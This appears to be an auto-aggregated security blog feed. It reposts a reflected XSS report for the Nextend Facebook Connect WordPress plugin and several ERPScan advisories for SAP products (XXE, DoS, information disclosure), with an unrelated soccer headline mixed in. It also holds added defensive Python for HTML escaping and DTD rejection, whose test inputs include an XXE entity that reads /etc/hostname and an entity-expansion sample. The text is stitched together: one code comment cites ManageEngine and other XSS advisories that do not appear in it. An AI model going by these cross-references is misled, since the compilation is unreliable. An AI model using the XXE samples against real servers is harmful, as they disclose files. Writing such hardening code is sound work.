After installing WordPress I added the plugin "Nextend Facebook Connect", which allows you to log in to WordPress with a Facebook account. During my test I found out that the “redirect_to” parameter is vulnerable to a Reflected XSS attack.

To reach the root of the problem, I took a look at the plugin source code and realized that the problem is in “new_fb_sign_button()”, which is located in the file “nextend-facebook-connect.php”. The problematic function is located at line 432:
http://ift.tt/1Lsim63

As you can see at line 432, the function doesn't escape HTML tags or other dangerous symbols. When an attacker injects JavaScript code in the URL, the function runs the code, as you can see:
http://ift.tt/1GFDOjF
And pops the alert window.

Solution - Fix & Patch:
=======================
In order to solve this security flaw you need to add the “htmlentities” function.
(http://ift.tt/11pVKOE)
As you can see in the image:
http://ift.tt/1GFDQIj

Liran Segal (Bugsec Information Security LTD)

Regards,
Liran Segal
Penetration Testing
BugSec Cyber & Information Security

Source: Gmail -> IFTTT-> Blogger
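The three XSS advisories above (ManageEngine Asset Explorer's scanned-software "Publisher" field, and the redirect_to parameter of the Nextend Connect plugins) share one defect: untrusted text is copied into HTML without escaping. The Python below is an added example, not code from any of the advisories or vendors: it parses a constructed .reg entry in the PoC's format, renders the Scanned Software table both unescaped (the reported behaviour) and escaped, and shows the attribute-context escaping that corresponds to the recommended htmlentities fix. The sample registry text, its harmless marker script and the function names are all constructed for this example.

```python
"""Added example: context-appropriate HTML escaping for the two sinks the
advisories describe (a stored value from a registry scan, and a reflected
query parameter inside an attribute). Nothing here is vendor code."""
import html
import re

# Constructed sample in the "Windows Registry Editor Version 5.00" format
# used by the ManageEngine PoC. The Publisher value stands in for untrusted
# data that a scan agent collects from an endpoint; marker() is not a payload.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software]
"DisplayName"="A fake software 2 installed"
"UninstallString"="C:\\Program Files\\fake\\uninst.exe"
"DisplayVersion"="0.500.20"
"URLInfoAbout"="http://www.dummy.org"
"Publisher"="<script>marker()</script>"
'''

_KEY_RE = re.compile(r'^\[(.+)\]$')
_VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg(text):
    """Parse .reg text into {key_path: {value_name: value}}.

    Only string (REG_SZ) values are handled. The .reg format escapes
    backslashes and double quotes with a backslash; both are undone here."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            current = keys.setdefault(m.group(1), {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name, value = m.group(1), m.group(2)
            current[name] = value.replace('\\\\', '\\').replace('\\"', '"')
    return keys


def software_row_unsafe(entry):
    """The pattern the ManageEngine advisory describes: scanned values are
    copied into markup verbatim. Kept only as the 'before' of the fix."""
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (
        entry.get("DisplayName", ""), entry.get("DisplayVersion", ""),
        entry.get("Publisher", ""))


def software_row(entry):
    """Hardened row: every field is escaped for element-content context."""
    cells = (html.escape(entry.get(k, ""), quote=True)
             for k in ("DisplayName", "DisplayVersion", "Publisher"))
    return "<tr>" + "".join("<td>%s</td>" % c for c in cells) + "</tr>"


def render_scanned_software(reg_text):
    """Build the Scanned Software table from every Uninstall key in a dump."""
    rows = [software_row(v) for k, v in parse_reg(reg_text).items()
            if "\\Uninstall\\" in k]
    return "<table>" + "".join(rows) + "</table>"


def sign_in_button(redirect_to):
    """Hardened counterpart of the Nextend sign-in button sink.

    redirect_to lands inside a double-quoted href attribute, so the quote
    character must be encoded as well as < > &. html.escape(quote=True)
    covers all of them, which is what the advisories' htmlentities fix does
    in PHP. (Hypothetical markup; the real plugin's output differs.)"""
    safe = html.escape(redirect_to, quote=True)
    return '<a class="sign-in" href="/login?redirect_to=%s">Sign in</a>' % safe
```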

Klinsmann picks 17 of 23 World Cup vets for Gold Cup

CHICAGO (AP) The U.S. roster for next month's CONCACAF Gold Cup will look a lot like the American team at last year's World Cup.

from FOX Sports Digital http://ift.tt/1SHCB0M
via IFTTT

[FD] ERPSCAN Research Advisory [ERPSCAN-15-011] SAP Mobile Platform 3.0 - XXE

ERPSCAN Research Advisory [ERPSCAN-15-011] SAP Mobile Platform 3.0 - XXE

Application: SAP Mobile Platform 3.0
Versions Affected: SAP Mobile Platform 3.0, probably others
Vendor URL: http://SAP.com
Bugs: XML eXternal Entity
Sent: 29.12.2014
Reported: 29.12.2014
Vendor response: 30.12.2014
Date of Public Advisory: 18.06.2015
Reference: SAP Security Note 2125513
Author: Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION
Title: SAP Mobile Platform 3.0 XXE
Advisory ID: [ERPSCAN-15-011]
Risk: High
Advisory URL: http://ift.tt/1K8P9ek
Date published: 15.03.2015
Vendors contacted: SAP

2. VULNERABILITY INFORMATION
Class: XML External Entity [CWE-611]
Impact: XML external entity, information disclosure, denial of service
Remotely Exploitable: Yes
Locally Exploitable: No

3. VULNERABILITY DESCRIPTION
The problem is caused by a program error in SAP Mobile Platform 3.0 due to the incorrect use of an XML parser (/mobiliser servlet). By default, the parser opens external entities referenced within an XML input, which can then lead to malicious content being parsed. This malicious content can reference internal resources, such as files. These internal resources can be disclosed in the response to the request, or can be used to perform a denial of service attack on the parsing system, rendering the application content temporarily unavailable.

4. VULNERABLE PACKAGES
SAP Mobile Platform 3.0
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2125513.

6. AUTHOR
Vahagn Vardanyan (ERPScan)

7. TECHNICAL DESCRIPTION
The SAP XML parser validates all incoming XML requests with a user-specified DTD.

8. REPORT TIMELINE
Sent: 29.12.2014
Reported: 29.12.2014
Vendor response: 30.12.2014
Date of Public Advisory: 18.06.2015

9. REFERENCES
http://ift.tt/1K8P9ek

10. ABOUT ERPScan Research
The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security.

ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few.

We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.

11. ABOUT ERPScan
ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions.

ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale.

Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software.

ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort.

We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.

Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
http://erpscan.com

Source: Gmail -> IFTTT-> Blogger

[FD] ERPSCAN Research Advisory [ERPSCAN-15-010] SYBASE SQL Anywhere 12 and 16 - DoS

ERPSCAN Research Advisory [ERPSCAN-15-010] SYBASE SQL Anywhere 12 and 16 - DoS

Application: SYBASE SQL Anywhere 12 and 16
Versions Affected: SYBASE SQL Anywhere 12 and 16, probably others
Vendor URL: http://SAP.com
Bugs: DoS
Sent: 09.12.2014
Reported: 09.12.2014
Vendor response: 10.12.2014
Date of Public Advisory: 18.06.2015
Reference: SAP Security Note 2108161
Author: Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION
Title: SYBASE SQL Anywhere 12 and 16 - DoS
Advisory ID: [ERPSCAN-15-010]
Risk: High
Advisory URL: http://ift.tt/1Fzwimo
Date published: 15.03.2015
Vendors contacted: SAP

2. VULNERABILITY INFORMATION
Class: DoS [CWE-122]
Impact: DoS
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2819

3. VULNERABILITY DESCRIPTION
An attacker can trigger a condition in which the process ceases to run. This condition can be intentionally provoked by an attacker to cause denial of service.

4. VULNERABLE PACKAGES
SYBASE SQL Anywhere 12 and 16
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2108161.

6. AUTHOR
Vahagn Vardanyan (ERPScan)

7. TECHNICAL DESCRIPTION
An anonymous attacker can use a special request to crash the Sybase SQL Anywhere process on the server.

8. REPORT TIMELINE
Sent: 09.12.2014
Reported: 09.12.2014
Vendor response: 10.12.2014
Date of Public Advisory: 18.06.2015

9. REFERENCES
http://ift.tt/1Fzwimo

Source: Gmail -> IFTTT-> Blogger

[FD] ERPSCAN Research Advisory [ERPSCAN-15-009] SAP Afaria 7 XcListener - Missing authorization check

[FD] ERPSCAN Research Advisory [ERPSCAN-15-008] SAP Afaria 7 XcListener - DoS in the module XeClient.Dll

[FD] ERPSCAN Research Advisory [ERPSCAN-15-007] SAP Management Console ReadProfile Parameters - Information disclosure

ERPSCAN Research Advisory [ERPSCAN-15-007] SAP Management Console ReadProfile Parameters - Information disclosure

Application: SAP Management Console
Versions Affected: SAP NW 7.4 Management Console, probably others
Vendor URL: http://SAP.com
Bugs: Information disclosure
Sent: 09.12.2014
Reported: 09.12.2014
Vendor response: 10.12.2014
Date of Public Advisory: 18.06.2015
Reference: SAP Security Note 2091768
Author: Dmitry Chastukhin (ERPScan)

Description

1. ADVISORY INFORMATION
Title: SAP Management Console ReadProfile Parameters - information disclosure
Advisory ID: [ERPSCAN-15-007]
Risk: High
Advisory URL: http://ift.tt/1GFy2yF
Date published: 15.03.2015
Vendors contacted: SAP

2. VULNERABILITY INFORMATION
Class: Information disclosure [CWE-200]
Impact: Information disclosure
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2817

3. VULNERABILITY DESCRIPTION
It is possible to get some information from the web interface of CCMS without authentication. An attacker can use the information for subsequent attacks which will lead to illegal access to business-critical information.

4. VULNERABLE PACKAGES
SAP NetWeaver 7.40 (sapstartsrv.exe, version v7400.12.21.30308).
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS
Install SAP Security Note 2091768 or upgrade the kernel to the associated patch level.

6. AUTHOR
Dmitry Chastukhin (ERPScan)

7. TECHNICAL DESCRIPTION
An anonymous attacker can send a special POST HTTP request to get information about any SAP profile parameters.

8. REPORT TIMELINE
Sent: 09.12.2014
Reported: 09.12.2014
Vendor response: 10.12.2014
Date of Public Advisory: 18.06.2015

9. REFERENCES
http://ift.tt/1GFy2yF

Source: Gmail -> IFTTT-> Blogger

[FD] ERPSCAN Research Advisory [ERPSCAN-15-006] SAP NetWeaver Portal ReportXmlViewer - XXE

ERPSCAN Research Advisory [ERPSCAN-15-006] SAP NetWeaver Portal ReportXmlViewer - XXE

Application: SAP NetWeaver Portal 7.31
Versions Affected: SAP NetWeaver Portal 7.31, probably others
Vendor URL: http://SAP.com
Bugs: XXE
Sent: 09.12.2014
Reported: 09.12.2014
Vendor response: 10.12.2014
Date of Public Advisory: 18.06.2015
Reference: SAP Security Note 2111939
Author: Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION
Title: SAP NetWeaver Portal ReportXmlViewer - XXE
Advisory ID: [ERPSCAN-15-006]
Risk: High
Advisory URL: http://ift.tt/1Hd0v0c
Date published: 15.03.2015
Vendors contacted: SAP

2. VULNERABILITY INFORMATION
Class: XXE [CWE-122]
Impact: XML external entity, information disclosure, denial of service, role upload, thread reporting
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2811

3. VULNERABILITY DESCRIPTION
By default, the parser opens external entities referenced within an XML input, which can then lead to malicious content being parsed. This malicious content can reference internal resources, such as files. These internal resources can be disclosed in the response to the request, or can be used to perform a denial of service attack on the parsing system, rendering the application content temporarily unavailable.

4. VULNERABLE PACKAGES
SAP NetWeaver Portal 7.31
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2111939.

6. AUTHOR
Vahagn Vardanyan (ERPScan)

7. TECHNICAL DESCRIPTION
The SAP XML parser validates all incoming XML requests with a user-specified DTD.

8. REPORT TIMELINE
Sent: 09.12.2014
Reported: 09.12.2014
Vendor response: 10.12.2014
Date of Public Advisory: 18.06.2015

9. REFERENCES
http://ift.tt/1Hd0v0c

Source: Gmail -> IFTTT-> Blogger

[FD] ERPSCAN Research Advisory [ERPSCAN-15-005] SAP Mobile Platform - XXE

ERPSCAN Research Advisory [ERPSCAN-15-005] SAP Mobile Platform - XXE

Application: SAP Mobile Platform 2.3
Versions Affected: SAP Mobile Platform 2.3, probably others
Vendor URL: http://SAP.com
Bugs: XML eXternal Entity
Sent: 06.11.14
Reported: 06.11.14
Vendor response: 07.11.14
Date of Public Advisory: 18.06.2015
Reference: SAP Security Note 2125358
Author: Dmitry Chastukhin (ERPScan)

Description

1. ADVISORY INFORMATION

Title: SAP Mobile Platform 2.3
Advisory ID: [ERPSCAN-15-005]
Risk: High
Advisory URL: http://ift.tt/1GFy1e2
Date published: 15.02.2015
Vendors contacted: SAP

2. VULNERABILITY INFORMATION

Class: XML External Entity [CWE-611]
Impact: information disclosure, denial of service, read file
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2813

3. VULNERABILITY DESCRIPTION

1) An attacker can read an arbitrary file on the server by sending a correct XML request with a crafted DTD to /scc/messagebroker/http and reading the reply from the service.
2) An attacker can perform a DoS attack (for example, an XML Entity Expansion attack).
3) An SMB Relay attack is a type of Man-in-the-Middle attack in which the attacker asks the victim to authenticate to a machine controlled by the attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways, giving them access.

4. VULNERABLE PACKAGES

SAP Mobile Platform 2.2
SAP Mobile Platform 2.3
Other versions are probably affected too, but they were not checked.

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2125358 or:
* Upgrade your existing SMP 2.2 installation to SMP 2.2 SP06 PL02
* Upgrade your existing SMP 2.3 installation to SMP 2.3 SP05 PL01

6. AUTHOR

Dmitry Chastukhin (ERPScan)

7. TECHNICAL DESCRIPTION

The SAP XML parser behind /scc/messagebroker/http validates all incoming XML requests with a user-specified DTD.

8. REPORT TIMELINE

Sent: 06.11.14
Reported: 07.11.14
Vendor response: 07.11.14
Date of Public Advisory: 18.06.2015

9. REFERENCES

http://ift.tt/1GFy1e2

10. ABOUT ERPScan Research

The company's expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013.

ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies.

ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security.

ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few.

We have highly qualified experts on staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.

11. ABOUT ERPScan

ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions.

ERPScan's primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale.

Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software.

ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort.

We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.

Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
http://erpscan.com
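The root cause stated in section 7 of the advisory is a parser that honours a DTD supplied by the requester, which is what allows all three outcomes listed in section 3 (file read through an external entity, entity-expansion DoS, and the outbound authentication an entity pointing at an attacker host would trigger). The example below is an added illustration of the fix on the parser side; it is not code from SAP or from ERPScan. It uses Python's standard-library expat binding to refuse any DOCTYPE, entity declaration or external entity reference before the request body is processed. The endpoint path is the one named in the advisory; the request bodies are constructed samples and assume nothing about the real messagebroker message format.

```python
"""Hardened XML intake: refuse any request that carries a DTD.

Added illustration, not code from SAP or ERPScan. The endpoint path comes
from the advisory; the request bodies below are constructed samples.
"""
import xml.parsers.expat

ENDPOINT = "/scc/messagebroker/http"  # path named in the advisory


class DtdNotAllowed(ValueError):
    """Raised when a request carries a DOCTYPE, entity declaration or external reference."""


def parse_without_dtd(xml_bytes: bytes) -> dict:
    """Parse an XML request with expat while refusing every DTD construct.

    Returns {"root": <root element name>, "elements": <element count>} for
    an accepted document; raises DtdNotAllowed otherwise.
    """
    parser = xml.parsers.expat.ParserCreate()
    # Never fetch an external DTD or parameter entity from disk or network.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    # Each handler aborts the parse: an exception raised inside an expat
    # handler propagates out of Parse(), so nothing after the DTD is processed.
    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE {name!r} is not accepted on {ENDPOINT}")

    def reject_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise DtdNotAllowed(f"entity declaration {name!r} is not accepted")

    def reject_external_ref(context, base, sysid, pubid):
        # Covers file://, http:// and UNC (\\host\share) system identifiers alike.
        raise DtdNotAllowed(f"external entity reference to {sysid!r} is not accepted")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity_decl
    parser.ExternalEntityRefHandler = reject_external_ref

    summary = {"root": None, "elements": 0}

    def on_start_element(name, attrs):
        if summary["root"] is None:
            summary["root"] = name
        summary["elements"] += 1

    parser.StartElementHandler = on_start_element
    parser.Parse(xml_bytes, True)
    return summary


def triage(xml_bytes: bytes) -> str:
    """Label a request body the way a request filter or log rule would."""
    try:
        parse_without_dtd(xml_bytes)
        return "accepted"
    except DtdNotAllowed as exc:
        return f"rejected: {exc}"
    except xml.parsers.expat.ExpatError as exc:
        return f"malformed: {exc}"


# Constructed sample bodies (not real SMP traffic).
BENIGN = b'<?xml version="1.0"?><request><action>ping</action></request>'
INTERNAL_ENTITY = (b'<?xml version="1.0"?>'
                   b'<!DOCTYPE request [<!ENTITY ext SYSTEM "file:///etc/hostname">]>'
                   b'<request>&ext;</request>')
EXPANSION = (b'<?xml version="1.0"?>'
             b'<!DOCTYPE request [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;&a;">]>'
             b'<request>&b;</request>')
EXTERNAL_DTD = (b'<?xml version="1.0"?>'
                b'<!DOCTYPE request SYSTEM "http://dtd.example/request.dtd">'
                b'<request/>')

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("file entity", INTERNAL_ENTITY),
                        ("expansion", EXPANSION), ("external dtd", EXTERNAL_DTD)]:
        print(f"{label:13s} -> {triage(body)}")
```

Rejecting the DOCTYPE outright is the simplest rule: it stops external entities, internal entity expansion and external DTD fetches in one place, and a request with a DTD on an endpoint that never needs one is itself worth logging. SAP Mobile Platform is a Java product, where the same effect comes from setting the JAXP feature http://apache.org/xml/features/disallow-doctype-decl to true on the parser factory; the vendor fix referenced in the advisory is SAP Security Note 2125358.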
